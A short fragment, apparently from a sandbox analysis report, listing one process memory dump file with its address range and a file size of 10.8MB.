        • memory/1376-29-0x00007FFB673E0000-0x00007FFB67EA1000-memory.dmp

          Filesize

          10.8MB